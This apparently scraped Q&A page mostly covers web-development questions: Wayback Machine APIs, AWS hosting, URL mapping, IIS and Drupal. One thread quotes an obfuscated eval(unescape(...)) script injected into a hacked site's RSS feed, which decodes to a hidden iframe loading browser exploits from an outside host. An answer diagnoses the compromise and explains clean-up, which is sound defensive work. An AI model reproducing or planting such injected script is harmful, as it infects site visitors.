What I'm trying to do
For a list of websites, I want the archived pages indexed by year: a site should appear under a year if it was archived at any point during that year. So if I'm looking at example1.com and example2.com, I want to be able to get:
2010: example1.com, example2.com (the HTML from these archived pages)
2011: example1.com (example2.com, say, was not archived in 2011)
2012: example2.com
2013: example1.com, example2.com
and so on.
Question
Is this possible to get using the Wayback Machine API? I looked at their API listing and it didn't seem like I could do what I was trying to do. Maybe I'm missing something, but it seems like a fairly plausible use case. Any other suggestions?
The key thing to understand about the Wayback Machine APIs is that there are (from what I can tell) three different ways to work with them.
Wayback Availability JSON API
The first is the API which is documented near the top of the Wayback Machine API page you already mentioned.
That API gives the nearest archived result, by date, for a given page. So you can check the Wayback Machine for copies of the Google homepage archived around New Year's Day like so:
http://archive.org/wayback/available?url=google.com&timestamp=20080101
http://archive.org/wayback/available?url=google.com&timestamp=20090101
http://archive.org/wayback/available?url=google.com&timestamp=20100101
etc.
Using the information returned in those URLs, you can easily download the content programmatically.
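For example, here is a minimal Python sketch using the requests library; the field names follow the JSON response shape documented on that page ("archived_snapshots" / "closest"):

    import requests

    def closest_snapshot(url, timestamp):
        """Return the capture of `url` nearest to `timestamp`, or None."""
        resp = requests.get(
            "http://archive.org/wayback/available",
            params={"url": url, "timestamp": timestamp},
        )
        resp.raise_for_status()
        return resp.json().get("archived_snapshots", {}).get("closest")

    snap = closest_snapshot("google.com", "20080101")
    if snap and snap.get("available"):
        html = requests.get(snap["url"]).text  # the archived page itself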
Wayback CDX Server API
Next we have the Wayback Machine CDX Server API which reveals a much richer series of interfaces. Most notably, you can quickly download every snapshot of a URL that you are interested in:
http://web.archive.org/cdx/search/cdx?url=www.fredtrotter.com
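As a rough Python sketch of consuming that: by default the CDX server returns one space-separated line per capture (urlkey, timestamp, original URL, mimetype, status code, digest, length), so listing every snapshot looks something like this:

    import requests

    # Fetch every capture the CDX server knows about for this URL.
    resp = requests.get(
        "http://web.archive.org/cdx/search/cdx",
        params={"url": "www.fredtrotter.com"},
    )
    resp.raise_for_status()
    for line in resp.text.splitlines():
        urlkey, timestamp, original, *_ = line.split(" ")
        print(timestamp, original)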
Memento API
Lastly we have the deep and mysterious resource that is the Wayback Machine Memento API. That link is to a blog post about the functionality, but from what I can gather, this is about working with the Wayback Machine at a protocol level, where the Memento Protocol is a well-thought-out version of the way an archive site should operate.
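From what I understand of the protocol, a timegate request looks like the sketch below: you send an Accept-Datetime header and the Wayback Machine redirects you to the nearest memento. Treat the exact endpoint here as my assumption rather than gospel:

    import requests

    # Ask the Wayback timegate for the memento nearest a given datetime.
    resp = requests.get(
        "http://web.archive.org/web/http://www.fredtrotter.com",
        headers={"Accept-Datetime": "Thu, 01 Jan 2010 00:00:00 GMT"},
        allow_redirects=False,  # inspect the redirect instead of following it
    )
    print(resp.status_code, resp.headers.get("Location"))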
Final thoughts
In all cases, please be gentle and respectful with your scripting. The Wayback Machine API does not currently require credentials, which is a very generous and open posture, in keeping with the Internet Archive's role as a "Wonder of the Virtual World". So do not abuse it, because that is how we ensure that we have nice things.
Thanks to Greg, and the rest of the Wayback Machine team, for the excellent work you do to keep the Internet a source of personal freedom and expression.
Our CDX API allows you to make two separate calls to get a list of all captures for the URL or domain example1.com and for the URL or domain example2.com. You can then produce whatever summary you like.
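For instance, a small Python sketch of that approach. The output=json and collapse parameters are from the CDX documentation; collapsing on the first four digits of the timestamp keeps at most one capture per year, which is exactly the per-year index asked for above:

    import requests
    from collections import defaultdict

    def captures_by_year(site):
        """Map year -> archived URLs for one site, in a single CDX call."""
        resp = requests.get(
            "http://web.archive.org/cdx/search/cdx",
            params={"url": site, "output": "json", "collapse": "timestamp:4"},
        )
        resp.raise_for_status()
        rows = resp.json()
        years = defaultdict(list)
        for _urlkey, timestamp, original, *_ in rows[1:]:  # rows[0] is the header
            years[timestamp[:4]].append(original)
        return years

    for site in ("example1.com", "example2.com"):
        for year, pages in sorted(captures_by_year(site).items()):
            print(year, site, pages)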
Related
Excuse my lack of server architecture knowledge, but I'm a bit confused about what applications, servers, environments, etc. are and how they can communicate with each other. I just got AWS, and here is what I want to do ultimately.
I want to create a Google Chrome extension. For simplicity, let's say that I'm trying to make an app that records the number of times that all users with the extension collectively visit a given webpage, plus information about the visits, such as the time they visited and the duration. So if I go to Facebook.com and 100 other people with the extension have too, I would see an iframe, let's say, that says "100 users have been here and they visited at these times: ...". Of course, the extension also needs to communicate with the server to increase the count by one. The point is, there is no need to visit any particular webpage for this app to work, since it's an extension; it still returns HTML and JavaScript, but the point isn't to go to a webpage.
Now, I also want a homepage for the app in case people are interested in the extension for whatever reason. Just like Adblock, you don't need to go to their actual website, but it's good to have one.
My question is, how do I set this up? Do I just have a normal website, i.e. www.example.com/, set it up normally with WordPress (what I'd like to use), and then designate one address, i.e. www.example.com/app, to be answered by my Python app? If so, how do I do that? What do I need in AWS? I'm familiar with Flask and have written apps on my local server using it; can that be integrated with WordPress?
Sorry if this is confusing.
I also want a homepage for the app in case people are interested in the extension
The simplest option is to host the home page as a static website (HTML, CSS, JS) in an S3 bucket.
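If you go that route, here is a minimal boto3 sketch. The bucket name is made up, and note that for regions other than us-east-1 create_bucket also needs a CreateBucketConfiguration:

    import boto3

    s3 = boto3.client("s3")
    bucket = "my-extension-homepage"  # hypothetical bucket name

    s3.create_bucket(Bucket=bucket)
    s3.put_bucket_website(
        Bucket=bucket,
        WebsiteConfiguration={
            "IndexDocument": {"Suffix": "index.html"},
            "ErrorDocument": {"Key": "error.html"},
        },
    )
    s3.upload_file("index.html", bucket, "index.html",
                   ExtraArgs={"ContentType": "text/html"})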
But if you really want WordPress, you can do that too.
For the backend web services your extension talks to, you can use Elastic Beanstalk; it is a very simple way to do that without wiring up all the components yourself.
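Since you already know Flask, here is a minimal sketch of the kind of app Beanstalk can run. The endpoint names and payload fields are invented for illustration; Beanstalk's Python platform looks for a WSGI callable named application by default:

    from collections import defaultdict
    from flask import Flask, jsonify, request

    application = Flask(__name__)
    visits = defaultdict(list)  # in-memory only; use a real database in production

    @application.route("/visit", methods=["POST"])
    def record_visit():
        # The extension POSTs {"url": ..., "time": ..., "duration": ...}
        data = request.get_json()
        visits[data["url"]].append({"time": data["time"], "duration": data["duration"]})
        return jsonify(count=len(visits[data["url"]]))

    @application.route("/count")
    def count():
        url = request.args.get("url", "")
        return jsonify(count=len(visits[url]), visits=visits[url])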
Probably a stupid question, or I am the stupid one.
For instance, I have a website http://www.mysite.domain, and another site, let's say a blog http://www.myblog.domain, on a totally different domain. I fully own both sites; however, they are not physically hosted together.
Now I want to map a path of my website to the blog, and keep all further routing consistent without a redirect (preserving the original URL):
http://www.mysite.domain/blog ---> http://www.myblog.domain
http://www.mysite.domain/blog/news ---> http://www.myblog.domain/news
http://www.mysite.domain/blog/aboutme ---> http://www.myblog.domain/aboutme
http://www.mysite.domain/blog/blog?title=whatever ---> http://www.myblog.domain/blog?title=whatever
Is that an evil thought, or is it possible?
Given that you have the same sub-domain, this is certainly possible. You would need infrastructure and probably new hardware that routes requests to your domain. There are commercial products (https://www.a10networks.com/products/application-delivery-controllers) that can easily achieve this with some custom scripting. I am not sure about equivalent open source products.
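To make the mapping concrete, here is a toy path-preserving proxy in Python/Flask. It is illustrative only (GET-only, no header forwarding); a real deployment would use a dedicated reverse proxy or one of the products above:

    import requests
    from flask import Flask, Response, request

    app = Flask(__name__)
    BLOG_ORIGIN = "http://www.myblog.domain"  # the site being mapped under /blog

    @app.route("/blog/", defaults={"path": ""})
    @app.route("/blog/<path:path>")
    def blog_proxy(path):
        # /blog/news?x=1 is fetched from http://www.myblog.domain/news?x=1,
        # while the browser keeps seeing www.mysite.domain/blog/news?x=1.
        upstream = requests.get(f"{BLOG_ORIGIN}/{path}", params=request.args)
        return Response(
            upstream.content,
            status=upstream.status_code,
            content_type=upstream.headers.get("Content-Type"),
        )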
I've currently got a reasonably large site up that I've been asked to make changes to.
Currently, to log in to this site you need to go to:
www.example.com/folder/loginpage.html
This site is only accessible internally at this time and it is unlikely to ever be accessible externally.
We would like to, however, be able to direct external users to a sub-directory on the site (a 'survey' form) which is located in
www.example.com/folder/subfolder/survey.html
This survey writes its results back to the main application, and I believe they are tightly integrated.
We initially tried the idea of using an additional IIS7 box as a reverse proxy; however, it is quite confusing to me, as I'm not very familiar with IIS/ARR and the other features required (I'm mostly familiar with networking). I did try to follow a number of tutorials but didn't get very far. I'd like to avoid it if possible.
How can I, using IIS7 (the site is in ASP.NET), restrict external users from accessing anything other than the survey pages (there are a few included files that are necessary as well)?
Is it possible to make www.example.com/folder/subfolder/survey.html a 'website' in itself so that I can publish a URL like survey.example.com externally?
I've come across other examples where access is restricted for specific pages but the root of the site is still accessible,
i.e.
www.eg.com/ is allowed but www.eg.com/admin.aspx is denied. I'd like the reverse in effect, and if possible, to hide the 'true' URL.
Hope someone can help! If using a reverse proxy is possible I'm happy to do it, but I'd need detailed instructions.
Thanks for reading,
Much appreciated!
Edit: Sorry all, I'm new to Stack Overflow; indeed, I've just realised that there are several other sub-communities. Is it more appropriate to ask this in a different community? If so, which one?
Thanks!
I currently develop Drupal websites using its multi-site feature, which allows me to have a single code base and support multiple distinct settings for each site.
I set up a dev server, and I was quite happy with my arrangement of domains like example.com.local (not that happy, because I had to perform a small conversion before entering production, but still quite happy), and the thing used to work well. Too bad I recently started to work at places outside the LAN in which my dev server resides, mostly at clients' places where I need to demo their sites. First of all I set up a dyndns.org account, and the server is now accessible through the Internet.
Unfortunately the whole domain-based multi-site setup ungracefully fell down, since I'm now accessing the server via myservername.dyndns.org and Drupal's algorithm takes the domain name into account, so I'm forced to use at least the TLD as part of the directory name (namely sites/local.example.com). So I decided to switch to directory-based multi-site, and now I'm able to access my server from inside the LAN using myservername.local/example.com (having renamed the sites/ subdirectories accordingly). You should easily see why this is suboptimal: when I browse to myservername.dyndns.org/example.com, Drupal looks for sites/org.example.com. I temporarily ended up making a link from sites/org.example.com to sites/local.example.com, but again, this does not scale well if and when I have to drop dyndns.org for, say, dev.mycorporatesite.com...
Is there any other possibility? I have full access to the server, I can change Apache2's configs, .htaccess and all the stuff.
I would recommend against referencing Drupal multisites by folder; instead, set up your server with a fixed domain name and each site in a subdomain.
So your dev server is at mydevserver.com
and then each site could be
client1.mydevserver.com
client2.mydevserver.com
etc.
If, at the same time as creating these, you also move the files folder from the default location to whatever the live site will be, i.e.
sites/livesite.com/files
then when you go live, all the file references will be correct (if you are on Drupal 7 this might not be an issue).
My feed is broken: Feed Validator says this portion is the problem. Any thoughts?
]]></content:encoded>
<wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/</wfw:commentRss>
<slash:comments>2</slash:comments>
</item>
</channel>
</rss>
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
<script language="javascript">eval(unescape("%64%6F%63...
You've been hacked. An attacker has compromised your site and added this script to the bottom of some of your pages (probably all of them, judging by your main site). It loads a bunch of exploit code against web-browsers and plugins that attempts to infect other people's computers. That it also results in the RSS being invalid is a side-effect.
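You can see what the injected script does by URL-decoding it yourself; a quick Python sketch (the decoded URL is hostile, do not visit it):

    from urllib.parse import unquote

    # The payload from the <script> tag above, split across lines for readability.
    payload = (
        "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65"
        "%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78"
        "%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68"
        "%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C"
        "%2F%69%66%72%61%6D%65%3E%27%29%3B"
    )
    print(unquote(payload))
    # document.write('<iframe src="http://iss9w8s89xx.org/in.php"
    #                 width=1 height=1 frameborder=0></iframe>');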
You need to get the site offline before it infects more people, then work on the clean-up, which will depend on how they compromised it and what kind of server it is. Certainly, at the very least, you will need to delete your current site code and upload fresh new scripts, from a machine you know is clean(*), with all your passwords changed. If it's your own [virtual] server, you will need to check that the server itself hasn't been rooted.
(*: a very common way sites are getting compromised at the moment is through hacked client machines running FTP. The trojans steal the FTP passwords when you connect. So you need to check and disinfect every machine you might have used to connect to the site. And if you find anything suspicious on one of them, don't trust AV tools to completely clean it, because today they just can't keep up with the quantity of malcode out there. Re-install the operating system instead.)